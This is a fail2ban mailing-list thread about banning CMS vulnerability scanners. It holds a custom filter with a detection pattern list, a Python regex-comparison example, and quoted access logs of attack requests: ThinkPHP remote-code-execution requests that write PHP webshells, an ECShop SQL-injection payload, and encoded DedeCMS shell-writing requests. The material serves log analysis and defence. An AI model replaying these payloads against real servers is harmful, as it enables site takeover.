You should create a custom jail like the following:



#******
cat > /etc/fail2ban/filter.d/custom-web-filter.conf << "EOF"
# Custom filter: ban a client whose access-log line contains one of the
# <badbots> patterns (tune the list to the probes seen in your log).
[Init]
# Alternation of regex fragments; escape metacharacters such as "." as "\.".
# Placed under [Init] so it can be overridden from jail.local, e.g.
#   filter = custom-web-filter[badbots="FCKeditor|mytag_js\.php"]
# (the <badbots> tag substitution needs fail2ban 0.10 or newer)
badbots = BanMePlease|phpMyAdmin|base64_decode

[Definition]
# Optional "vhost:port " prefix so the expression matches Apache's
# vhost_combined format (vhost:port client ...) as well as the plain
# combined format, where the client address is the first field.
failregex = ^(?:[\w.-]+:\d+ )?<HOST> .*(?:<badbots>)

ignoreregex =
EOF
#*******



Wayne Sallee
wa...@waynesallee.com




-------- Original Message --------
*Subject: *  [Fail2ban-users] which jail to enable for crawlers looking for CMS vulnerabilities
*From: *     Robert Kudyba <rkud...@fordham.edu>
*To: *         Fail2ban-users <fail2ban-users@lists.sourceforge.net>
*CC: *        
*Date: *      2019-7-9  02:01 PM
I already have these enabled:
apache-auth, apache-badbots, apache-noscript, apache-overflows, apache-nohome, apache-botsearch.

But none are catching logs like these:
185.153.180.63 - - [09/Jul/2019:11:05:32 -0400] "POST /FCKeditor/editor/filemanager/connectors/asp/connector.asp?Command=FileUpload&Type=File&CurrentFolder=%2F HTTP/1.1" 301 348 "http://ourdomain.edu/FCKeditor/editor/filemanager/connectors/asp/connector.asp?Command=FileUpload&Type=File&CurrentFolder=%2F" "Mozilla/5.0 (compatible; MSIE 10.0; Windows NT 6.2)"
185.153.180.63 - - [09/Jul/2019:11:05:32 -0400] "POST /FCKeditor/editor/filemanager/connectors/asp/connector.asp?Command=FileUpload&Type=File&CurrentFolder=%2F HTTP/1.1" 301 348 "http://ourdomain.edu/FCKeditor/editor/filemanager/connectors/asp/connector.asp?Command=FileUpload&Type=File&CurrentFolder=%2F" "Mozilla/5.0 (compatible; MSIE 10.0; Windows NT 6.2)"
185.153.180.63 - - [09/Jul/2019:11:05:32 -0400] "GET /index.php?m=member&c=index&a=register&siteid=1 HTTP/1.1" 301 294 "http://ourdomain.edu/index.php?m=member&c=index&a=register&siteid=1" "Mozilla/5.0 (compatible; MSIE 10.0; Windows NT 6.2)"
185.153.180.63 - - [09/Jul/2019:11:05:32 -0400] "POST /admin_aspcms/_system/AspCms_SiteSetting.asp HTTP/1.1" 301 279 "http://ourdomain.edu/admin_aspcms/_system/AspCms_SiteSetting.asp" "Mozilla/5.0 (compatible; MSIE 10.0; Windows NT 6.2)"
185.153.180.63 - - [09/Jul/2019:11:05:33 -0400] "GET /plus/moon.php HTTP/1.1" 301 249 "http://ourdomain.edu/plus/moon.php" "Mozilla/5.0 (compatible; MSIE 10.0; Windows NT 6.2)"
185.153.180.63 - - [09/Jul/2019:11:05:33 -0400] "POST /plus/90sec.php HTTP/1.1" 301 250 "http://ourdomain.edu/plus/90sec.php" "Mozilla/5.0 (compatible; MSIE 10.0; Windows NT 6.2)"
185.153.180.63 - - [09/Jul/2019:11:05:33 -0400] "POST /utility/convert/index.php?a=config&source=d7.2_x2.0 HTTP/1.1" 301 291 "http://ourdomain.edu/utility/convert/index.php?a=config&source=d7.2_x2.0" "Mozilla/5.0 (compatible; MSIE 10.0; Windows NT 6.2)"
185.153.180.63 - - [09/Jul/2019:11:05:33 -0400] "POST /utility/convert/data/config.inc.php HTTP/1.1" 301 271 "http://ourdomain.edu/utility/convert/data/config.inc.php" "Mozilla/5.0 (compatible; MSIE 10.0; Windows NT 6.2)"
185.153.180.63 - - [09/Jul/2019:11:05:52 -0400] "POST /uploads/dede/sys_verifies.php?action="" HTTP/1.1" 301 277 "http://ourdomain.edu/uploads/dede/sys_verifies.php?action="">" "Mozilla/5.0 (compatible; MSIE 10.0; Windows NT 6.2)"
185.153.180.63 - - [09/Jul/2019:11:05:52 -0400] "POST /index.php/api/Uploadify/preview HTTP/1.1" 301 267 "http://ourdomain.edu/index.php/api/Uploadify/preview" "Mozilla/5.0 (compatible; MSIE 10.0; Windows NT 6.2)"
185.153.180.63 - - [09/Jul/2019:11:05:53 -0400] "GET /user.php?act=login HTTP/1.1" 301 254 "554fcae493e564ee0dc75bdf2ebf94caads|a:2:{s:3:\"num\";s:288:\"*/ union select 1,0x272f2a,3,4,5,6,7,8,0x7b24617364275D3B617373657274286261736536345F6465636F646528275A6D6C735A56397764585266593239756447567564484D6F4A325A6B5A334575634768774A79776E50443977614841675A585A686243676B583142505531526262475678645630704F79412F506963702729293B2F2F7D787878,10-- -\";s:2:\"id\";s:3:\"'/*\";}" "Mozilla/5.0 (compatible; MSIE 10.0; Windows NT 6.2)"
185.153.180.63 - - [09/Jul/2019:11:05:53 -0400] "POST /fdgq.php HTTP/1.1" 301 244 "http://ourdomain.edu/fdgq.php" "Mozilla/5.0 (compatible; MSIE 10.0; Windows NT 6.2)"
185.153.180.63 - - [09/Jul/2019:11:05:54 -0400] "GET /?s=index/%5Cthink%5Ctemplate%5Cdriver%5Cfile/write&cacheFile=cyggn.php&content=%3C?php%20mb_ereg_replace('.*',@$_REQUEST%5B_%5D,%20'',%20'e');?%3E HTTP/1.1" 301 390 "http://ourdomain.edu/?s=index/\\think\\template\\driver\\file/write&cacheFile=cyggn.php&content=<?php mb_ereg_replace('.*',@$_REQUEST[_], '', 'e');?>" "Mozilla/5.0 (compatible; MSIE 10.0; Windows NT 6.2)"
185.153.180.63 - - [09/Jul/2019:11:05:54 -0400] "POST /cyggn.php HTTP/1.1" 301 245 "http://ourdomain.edu/cyggn.php" "Mozilla/5.0 (compatible; MSIE 10.0; Windows NT 6.2)"
185.153.180.63 - - [09/Jul/2019:11:06:13 -0400] "POST /ysyqq.php HTTP/1.1" 301 245 "http://ourdomain.edu/ysyqq.php" "Mozilla/5.0 (compatible; MSIE 10.0; Windows NT 6.2)"
185.153.180.63 - - [09/Jul/2019:11:06:14 -0400] "GET /?s=/index/%5Cthink%5Capp/invokefunction&function=call_user_func_array&vars%5B0%5D=file_put_contents&vars%5B1%5D%5B%5D=virkf.php&vars%5B1%5D%5B%5D=%3C?php%20mb_ereg_replace('.*',@$_REQUEST%5B_%5D,%20'',%20'e');?%3E$ HTTP/1.1" 301 466 "http://ourdomain.edu/?s=/index/%5Cthink%5Capp/invokefunction&function=call_user_func_array&vars[0]=file_put_contents&vars[1][]=virkf.php&vars[1][]=<?php mb_ereg_replace('.*',@$_REQUEST[_], '', 'e');?>$" "Mozilla/5.0 (compatible; MSIE 10.0; Windows NT 6.2)"
185.153.180.63 - - [09/Jul/2019:11:06:14 -0400] "POST /virkf.php HTTP/1.1" 301 245 "http://ourdomain.edu/virkf.php" "Mozilla/5.0 (compatible; MSIE 10.0; Windows NT 6.2)"
185.153.180.63 - - [09/Jul/2019:11:06:15 -0400] "GET /plus/mytag_js.php?dopost=saveedit&arrs1%5B%5D=99&arrs1%5B%5D=102&arrs1%5B%5D=103&arrs1%5B%5D=95&arrs1%5B%5D=100&arrs1%5B%5D=98&arrs1%5B%5D=112&arrs1%5B%5D=114&arrs1%5B%5D=101&arrs1%5B%5D=102&arrs1%5B%5D=105&arrs1%5B%5D=120&arrs2%5B%5D=109&arrs2%5B%5D=121&arrs2%5B%5D=116&arrs2%5B%5D=97&arrs2%5B%5D=103&arrs2%5B%5D=96&arrs2%5B%5D=32&arrs2%5B%5D=40&arrs2%5B%5D=97&arrs2%5B%5D=105&arrs2%5B%5D=100&arrs2%5B%5D=44&arrs2%5B%5D=110&arrs2%5B%5D=111&arrs2%5B%5D=114&arrs2%5B%5D=109&arrs2%5B%5D=98&arrs2%5B%5D=111&arrs2%5B%5D=100&arrs2%5B%5D=121&arrs2%5B%5D=41&arrs2%5B%5D=32&arrs2%5B%5D=86&arrs2%5B%5D=65&arrs2%5B%5D=76&arrs2%5B%5D=85&arrs2%5B%5D=69&arrs2%5B%5D=83&arrs2%5B%5D=40&arrs2%5B%5D=57&arrs2%5B%5D=48&arrs2%5B%5D=57&arrs2%5B%5D=48&arrs2%5B%5D=44&arrs2%5B%5D=39&arrs2%5B%5D=60&arrs2%5B%5D=63&arrs2%5B%5D=112&arrs2%5B%5D=104&arrs2%5B%5D=112&arrs2%5B%5D=32&arrs2%5B%5D=101&arrs2%5B%5D=99&arrs2%5B%5D=104&arrs2%5B%5D=111&arrs2%5B%5D=32&arrs2%5B%5D=39&arrs2%5B%5D=39&arrs2%5B%5D=100&arrs2%5B%5D=101&arrs2%5B%5D=100&arrs2%5B%5D=101&arrs2%5B%5D=99&arrs2%5B%5D=109&arrs2%5B%5D=115&arrs2%5B%5D=32&arrs2%5B%5D=53&arrs2%5B%5D=46&arrs2%5B%5D=55&arrs2%5B%5D=32&arrs2%5B%5D=48&arrs2%5B%5D=100&arrs2%5B%5D=97&arrs2%5B%5D=121&arrs2%5B%5D=60&arrs2%5B%5D=98&arrs2%5B%5D=114&arrs2%5B%5D=62&arrs2%5B%5D=103&arrs2%5B%5D=117&arrs2%5B%5D=105&arrs2%5B%5D=103&arrs2%5B%5D=101&arrs2%5B%5D=44&arrs2%5B%5D=32&arrs2%5B%5D=57&arrs2%5B%5D=48&arrs2%5B%5D=115&arrs2%5B%5D=101&arrs2%5B%5D=99&arrs2%5B%5D=46&arrs2%5B%5D=111&arrs2%5B%5D=114&arrs2%5B%5D=103&arrs2%5B%5D=39&arrs2%5B%5D=39&arrs2%5B%5D=59&arrs2%5B%5D=64&arrs2%5B%5D=112&arrs2%5B%5D=114&arrs2%5B%5D=101&arrs2%5B%5D=103&arrs2%5B%5D=95&arrs2%5B%5D=114&arrs2%5B%5D=101&arrs2%5B%5D=112&arrs2%5B%5D=108&arrs2%5B%5D=97&arrs2%5B%5D=99&arrs2%5B%5D=101&arrs2%5B%5D=40&arrs2%5B%5D=39&arrs2%5B%5D=39&arrs2%5B%5D=47&arrs2%5B%5D=91&arrs2%5B%5D=99&arrs2%5B%5D=111&arrs2%5B%5D=112&arrs2%5B%5D=121&arrs2%5B%5D=114&arrs2%5B%5D=105&arrs2%5B%5D=103&arrs2%5B%5D=104&arrs2%5B%5D=116&arrs2%5B%5D=93&arrs2%5B%5D=47&arrs2%5B%5D=101&arrs2%5B%5D=39&arrs2%5B%5D=39&arrs2%5B%5D=44&arrs2%5B%5D=36&arrs2%5B%5D=95&arrs2%5B%5D=82&arrs2%5B%5D=69&arrs2%5B%5D=81&arrs2%5B%5D=85&arrs2%5B%5D=69&arrs2%5B%5D=83&arrs2%5B%5D=84&arrs2%5B%5D=91&arrs2%5B%5D=39&arrs2%5B%5D=39&arrs2%5B%5D=103&arrs2%5B%5D=117&arrs2%5B%5D=105&arrs2%5B%5D=103&arrs2%5B%5D=101&arrs2%5B%5D=39&arrs2%5B%5D=39&arrs2%5B%5D=93&arrs2%5B%5D=44&arrs2%5B%5D=39&arrs2%5B%5D=39&arrs2%5B%5D=101&arrs2%5B%5D=114&arrs2%5B%5D=114&arrs2%5B%5D=111&arrs2%5B%5D=114&arrs2%5B%5D=39&arrs2%5B%5D=39&arrs2%5B%5D=41&arrs2%5B%5D=59&arrs2%5B%5D=63&arrs2%5B%5D=62&arrs2%5B%5D=39&arrs2%5B%5D=41&arrs2%5B%5D=59&arrs2%5B%5D=0 HTTP/1.1" 301 3573 "http://ourdomain.edu/plus/mytag_js.php?dopost=saveedit&arrs1[]=99&arrs1[]=102&arrs1[]=103&arrs1[]=95&arrs1[]=100&arrs1[]=98&arrs1[]=112&arrs1[]=114&arrs1[]=101&arrs1[]=102&arrs1[]=105&arrs1[]=120&arrs2[]=109&arrs2[]=121&arrs2[]=116&arrs2[]=97&arrs2[]=103&arrs2[]=96&arrs2[]=32&arrs2[]=40&arrs2[]=97&arrs2[]=105&arrs2[]=100&arrs2[]=44&arrs2[]=110&arrs2[]=111&arrs2[]=114&arrs2[]=109&arrs2[]=98&arrs2[]=111&arrs2[]=100&arrs2[]=121&arrs2[]=41&arrs2[]=32&arrs2[]=86&arrs2[]=65&arrs2[]=76&arrs2[]=85&arrs2[]=69&arrs2[]=83&arrs2[]=40&arrs2[]=57&arrs2[]=48&arrs2[]=57&arrs2[]=48&arrs2[]=44&arrs2[]=39&arrs2[]=60&arrs2[]=63&arrs2[]=112&arrs2[]=104&arrs2[]=112&arrs2[]=32&arrs2[]=101&arrs2[]=99&arrs2[]=104&arrs2[]=111&arrs2[]=32&arrs2[]=39&arrs2[]=39&arrs2[]=100&arrs2[]=101&arrs2[]=100&arrs2[]=101&arrs2[]=99&arrs2[]=109&arrs2[]=115&arrs2[]=32&arrs2[]=53&arrs2[]=46&arrs2[]=55&arrs2[]=32&arrs2[]=48&arrs2[]=100&arrs2[]=97&arrs2[]=121&arrs2[]=60&arrs2[]=98&arrs2[]=114&arrs2[]=62&arrs2[]=103&arrs2[]=117&arrs2[]=105&arrs2[]=103&arrs2[]=101&arrs2[]=44&arrs2[]=32&arrs2[]=57&arrs2[]=48&arrs2[]=115&arrs2[]=101&arrs2[]=99&arrs2[]=46&arrs2[]=111&arrs2[]=114&arrs2[]=103&arrs2[]=39&arrs2[]=39&arrs2[]=59&arrs2[]=64&arrs2[]=112&arrs2[]=114&arrs2[]=101&arrs2[]=103&arrs2[]=95&arrs2[]=114&arrs2[]=101&arrs2[]=112&arrs2[]=108&arrs2[]=97&arrs2[]=99&arrs2[]=101&arrs2[]=40&arrs2[]=39&arrs2[]=39&arrs2[]=47&arrs2[]=91&arrs2[]=99&arrs2[]=111&arrs2[]=112&arrs2[]=121&arrs2[]=114&arrs2[]=105&arrs2[]=103&arrs2[]=104&arrs2[]=116&arrs2[]=93&arrs2[]=47&arrs2[]=101&arrs2[]=39&arrs2[]=39&arrs2[]=44&arrs2[]=36&arrs2[]=95&arrs2[]=82&arrs2[]=69&arrs2[]=81&arrs2[]=85&arrs2[]=69&arrs2[]=83&arrs2[]=84&arrs2[]=91&arrs2[]=39&arrs2[]=39&arrs2[]=103&arrs2[]=117&arrs2[]=105&arrs2[]=103&arrs2[]=101&arrs2[]=39&arrs2[]=39&arrs2[]=93&arrs2[]=44&arrs2[]=39&arrs2[]=39&arrs2[]=101&arrs2[]=114&arrs2[]=114&arrs2[]=111&arrs2[]=114&arrs2[]=39&arrs2[]=39&arrs2[]=41&arrs2[]=59&arrs2[]=63&arrs2[]=62&arrs2[]=39&arrs2[]=41&arrs2[]=59&arrs2[]=0" "Mozilla/5.0 (compatible; MSIE 10.0; Windows NT 6.2)"
185.153.180.63 - - [09/Jul/2019:11:06:16 -0400] "GET /plus/download.php?open=1&arrs1%5B%5D=99&arrs1%5B%5D=102&arrs1%5B%5D=103&arrs1%5B%5D=95&arrs1%5B%5D=100&arrs1%5B%5D=98&arrs1%5B%5D=112&arrs1%5B%5D=114&arrs1%5B%5D=101&arrs1%5B%5D=102&arrs1%5B%5D=105&arrs1%5B%5D=120&arrs2%5B%5D=109&arrs2%5B%5D=121&arrs2%5B%5D=97&arrs2%5B%5D=100&arrs2%5B%5D=96&arrs2%5B%5D=32&arrs2%5B%5D=83&arrs2%5B%5D=69&arrs2%5B%5D=84&arrs2%5B%5D=32&arrs2%5B%5D=96&arrs2%5B%5D=110&arrs2%5B%5D=111&arrs2%5B%5D=114&arrs2%5B%5D=109&arrs2%5B%5D=98&arrs2%5B%5D=111&arrs2%5B%5D=100&arrs2%5B%5D=121&arrs2%5B%5D=96&arrs2%5B%5D=32&arrs2%5B%5D=61&arrs2%5B%5D=32&arrs2%5B%5D=39&arrs2%5B%5D=60&arrs2%5B%5D=63&arrs2%5B%5D=112&arrs2%5B%5D=104&arrs2%5B%5D=112&arrs2%5B%5D=32&arrs2%5B%5D=102&arrs2%5B%5D=105&arrs2%5B%5D=108&arrs2%5B%5D=101&arrs2%5B%5D=95&arrs2%5B%5D=112&arrs2%5B%5D=117&arrs2%5B%5D=116&arrs2%5B%5D=95&arrs2%5B%5D=99&arrs2%5B%5D=111&arrs2%5B%5D=110&arrs2%5B%5D=116&arrs2%5B%5D=101&arrs2%5B%5D=110&arrs2%5B%5D=116&arrs2%5B%5D=115&arrs2%5B%5D=40&arrs2%5B%5D=39&arrs2%5B%5D=39&arrs2%5B%5D=109&arrs2%5B%5D=111&arrs2%5B%5D=111&arrs2%5B%5D=110&arrs2%5B%5D=46&arrs2%5B%5D=112&arrs2%5B%5D=104&arrs2%5B%5D=112&arrs2%5B%5D=39&arrs2%5B%5D=39&arrs2%5B%5D=44&arrs2%5B%5D=39&arrs2%5B%5D=39&arrs2%5B%5D=60&arrs2%5B%5D=63&arrs2%5B%5D=112&arrs2%5B%5D=104&arrs2%5B%5D=112&arrs2%5B%5D=32&arrs2%5B%5D=101&arrs2%5B%5D=118&arrs2%5B%5D=97&arrs2%5B%5D=108&arrs2%5B%5D=40&ar HTTP/1.1" 301 1950 "http://ourdomain.edu/plus/download.php?open=1&arrs1[]=99&arrs1[]=102&arrs1[]=103&arrs1[]=95&arrs1[]=100&arrs1[]=98&arrs1[]=112&arrs1[]=114&arrs1[]=101&arrs1[]=102&arrs1[]=105&arrs1[]=120&arrs2[]=109&arrs2[]=121&arrs2[]=97&arrs2[]=100&arrs2[]=96&arrs2[]=32&arrs2[]=83&arrs2[]=69&arrs2[]=84&arrs2[]=32&arrs2[]=96&arrs2[]=110&arrs2[]=111&arrs2[]=114&arrs2[]=109&arrs2[]=98&arrs2[]=111&arrs2[]=100&arrs2[]=121&arrs2[]=96&arrs2[]=32&arrs2[]=61&arrs2[]=32&arrs2[]=39&arrs2[]=60&arrs2[]=63&arrs2[]=112&arrs2[]=104&arrs2[]=112&arrs2[]=32&arrs2[]=102&arrs2[]=105&arrs2[]=108&arrs2[]=101&arrs2[]=95&arrs2[]=112&arrs2[]=117&arrs2[]=116&arrs2[]=95&arrs2[]=99&arrs2[]=111&arrs2[]=110&arrs2[]=116&arrs2[]=101&arrs2[]=110&arrs2[]=116&arrs2[]=115&arrs2[]=40&arrs2[]=39&arrs2[]=39&arrs2[]=109&arrs2[]=111&arrs2[]=111&arrs2[]=110&arrs2[]=46&arrs2[]=112&arrs2[]=104&arrs2[]=112&arrs2[]=39&arrs2[]=39&arrs2[]=44&arrs2[]=39&arrs2[]=39&arrs2[]=60&arrs2[]=63&arrs2[]=112&arrs2[]=104&arrs2[]=112&arrs2[]=32&arrs2[]=101&arrs2[]=118&arrs2[]=97&arrs2[]=108&arrs2[]=40&ar" "Mozilla/5.0 (compatible; MSIE 10.0; Windows NT 6.2)"
185.153.180.63 - - [09/Jul/2019:11:06:17 -0400] "POST /admin_aspcms/_system/AspCms_SiteSetting.asp HTTP/1.1" 301 279 "http://ourdomain.edu/admin_aspcms/_system/AspCms_SiteSetting.asp" "Mozilla/5.0 (compatible; MSIE 10.0; Windows NT 6.2)"
185.153.180.63 - - [09/Jul/2019:11:06:19 -0400] "POST /e/DoInfo/ecms.php HTTP/1.1" 301 253 "http://ourdomain.edu/e/DoInfo/ecms.php" "Mozilla/5.0 (compatible; MSIE 10.0; Windows NT 6.2)"

Any idea which jail I should enable?


_______________________________________________
Fail2ban-users mailing list
Fail2ban-users@lists.sourceforge.net
https://lists.sourceforge.net/lists/listinfo/fail2ban-users


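The following is an added example, not code from this thread or from fail2ban itself. It runs three failregex variants over constructed Apache access-log lines (RFC 5737 documentation addresses, request paths modelled on the probes quoted above) to show why the enabled jails miss this scanner: apache-badbots only inspects the User-Agent field, which here is an ordinary MSIE string, while a filter keyed on the request line catches every probe. It also shows that a bare "(:80|:443) <HOST>" prefix only matches Apache's vhost_combined format, not the plain combined format of the quoted lines. The `<HOST>` expansion used is a simplified stand-in for fail2ban's own (an assumption), and the BADBOTS and UA_BADBOTS lists are illustrative.

```python
"""
Added example (not from the mailing-list thread or from fail2ban): compare a
User-Agent based failregex, the reply's "(:80|:443) <HOST>" prefix as posted,
and a request-line failregex with an optional vhost prefix, over constructed
access-log lines. Assumption: HOST below is a simplified stand-in for
fail2ban's real <HOST> tag expansion.
"""
import re
from collections import Counter

# Simplified stand-in for fail2ban's <HOST> tag (assumption; fail2ban's own
# expansion treats IPv4, IPv6 and hostnames more carefully).
HOST = r"(?P<host>[\w.:-]+)"

# Request-path fragments taken from the probes quoted in the thread.
# Metacharacters are escaped; the scanner's %5C ("\") encoding is kept literal.
BADBOTS = (
    r"FCKeditor|AspCms_SiteSetting\.asp|plus/mytag_js\.php|plus/download\.php"
    r"|think%5Capp/invokefunction|think%5Ctemplate%5Cdriver|utility/convert"
)

# 1) User-Agent based, the shape apache-badbots uses: only the UA field counts.
UA_BADBOTS = r"EmailCollector|Jorgee|masscan"  # illustrative UA strings
FAILREGEX_UA = re.compile(
    rf'^{HOST} -.*"(?:GET|POST|HEAD).*HTTP.*"(?:{UA_BADBOTS})"$'
)

# 2) The reply's prefix as posted: needs "vhost:port" before the client IP,
#    i.e. Apache's vhost_combined LogFormat, so plain combined lines never match.
FAILREGEX_VHOST_ONLY = re.compile(rf"(?::80|:443) {HOST} .*(?:{BADBOTS})")

# 3) Request-line based, vhost:port prefix optional, so it matches both
#    'combined' (client IP first) and 'vhost_combined' lines.
FAILREGEX_REQ = re.compile(
    rf'^(?:[\w.-]+:\d+ )?{HOST} .*"(?:GET|POST|HEAD) [^"]*(?:{BADBOTS})',
    re.IGNORECASE,
)

UA = '"Mozilla/5.0 (compatible; MSIE 10.0; Windows NT 6.2)"'
# Constructed sample lines in 'combined' format, modelled on the quoted probes.
LOG_COMBINED = [
    '203.0.113.5 - - [09/Jul/2019:11:05:32 -0400] "POST /FCKeditor/editor/'
    'filemanager/connectors/asp/connector.asp?Command=FileUpload HTTP/1.1" '
    '301 348 "-" ' + UA,
    '203.0.113.5 - - [09/Jul/2019:11:05:33 -0400] "POST /admin_aspcms/_system/'
    'AspCms_SiteSetting.asp HTTP/1.1" 301 279 "-" ' + UA,
    '203.0.113.5 - - [09/Jul/2019:11:06:14 -0400] "GET /?s=/index/%5Cthink%5Capp/'
    'invokefunction&function=call_user_func_array HTTP/1.1" 301 466 "-" ' + UA,
    '198.51.100.7 - - [09/Jul/2019:11:07:01 -0400] "GET /index.html HTTP/1.1" '
    '200 1234 "-" ' + UA,  # benign request from another client
]
# Constructed sample line in 'vhost_combined' format (vhost:port client ...).
LOG_VHOST = [
    'ourdomain.edu:80 203.0.113.5 - - [09/Jul/2019:11:06:15 -0400] '
    '"GET /plus/mytag_js.php?dopost=saveedit HTTP/1.1" 301 3573 "-" ' + UA,
]


def tally(failregex, lines):
    """Count matching lines per <host>, the way fail2ban accumulates failures."""
    hits = Counter()
    for line in lines:
        m = failregex.search(line)
        if m:
            hits[m.group("host")] += 1
    return hits


def would_ban(hits, maxretry=3):
    """Hosts that reached maxretry (findtime is ignored for simplicity)."""
    return sorted(h for h, n in hits.items() if n >= maxretry)


if __name__ == "__main__":
    for name, rx in (("apache-badbots style (User-Agent)", FAILREGEX_UA),
                     ("reply's prefix as posted", FAILREGEX_VHOST_ONLY),
                     ("request line, optional vhost prefix", FAILREGEX_REQ)):
        hits = tally(rx, LOG_COMBINED + LOG_VHOST)
        print(f"{name}: {dict(hits)} -> ban {would_ban(hits)}")
```

Against the real filter file, the equivalent check is `fail2ban-regex /var/log/httpd/access_log /etc/fail2ban/filter.d/custom-web-filter.conf`, which reports how many lines each failregex matched; the filter only takes effect once a `[custom-web-filter]` stanza in jail.local sets `enabled = true`, `filter = custom-web-filter`, `port = http,https` and the `logpath` of the access log. Because the request-line filter keys on paths rather than on a User-Agent, the watched paths should be ones the site never serves legitimately, or a real user could be banned.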
